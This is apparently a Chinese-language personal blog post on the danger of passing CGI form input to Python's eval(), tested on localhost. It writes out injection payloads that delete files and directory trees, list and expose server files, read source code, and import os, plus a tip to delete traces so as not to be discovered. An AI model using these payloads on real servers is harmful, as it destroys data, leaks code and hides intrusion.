Python的eval()函數可以把字符串“123”變成數字類型的123,PP3E上說它很危險,還可以執行其他命令!
在家沒事,做了些試驗。果然,如果python寫的cgi程序中如果使用eval()而非int()來轉換諸如年齡這樣的輸入框中的內容時是非常危險的。不僅可以看見列出系統的全部文件,還可以刪除文件,察看文件源代碼。
試著寫了個程序,想把本地的腳本文件同過這樣的形式一行一行的寫到服務器的某個文件裡,可最後失敗在無法輸入換行符"/n",在提交的語句裡只要有換行符,就會出現EOL的出錯提示,換了編碼方式還是沒能成功。
網頁裡有一個提交名字的窗口,這裡只是以改它為例,否則名字是不會用eval函數轉換的,不過年齡到是很容易出問題。這個文件(http://localhost/tutor4.html)導入了os。
line1 = "Hello, %s." % eval(form['user'].value)
(1)os.system(‘del * /q’) #刪除當前目錄下所有文件(不包括文件夾)。
os.system調用當前系統的命令(如windows)
/q
指定靜音狀態。不提示您確認刪除。
(2)若刪除文件夾,使用rmdir
/s
刪除指定目錄和所有子目錄以及包含的所有文件。使用 /s 來刪除目錄樹。
/q
在安靜模式中運行 rmdir。不經確認即刪除目錄。
os.system(‘rmdir d:/workspace /s/q’)
(3)列出所有文件os.system(‘dir’)。因為成功執行了dir命令後,系統返回0,所以看到的返回內容只能是Hello,0.而在服務器上,倒是真的列出來了,如果有日志,可能被發現。提交os.system(‘dir >dir.txt’),那麼訪問http://localhost/dir.txt,所有的文件和文件夾都暴露了,想看源代碼嗎?如果再使用os.system(‘type target.py’).命令如果成功完成同樣會返回Hello, 0.的。難道再放進一個文件,再訪問那個文件嗎?open(‘target.py’).read()
由此,可以在列出和察看其他文件夾裡面的內容了。
如果沒干別的壞事,那麼可刪除dir.txt以免被人發現了。os.system(‘del dir.txt /q’)
導入os並執行命令:
__import__(‘os’).system(‘dir >dir.txt’)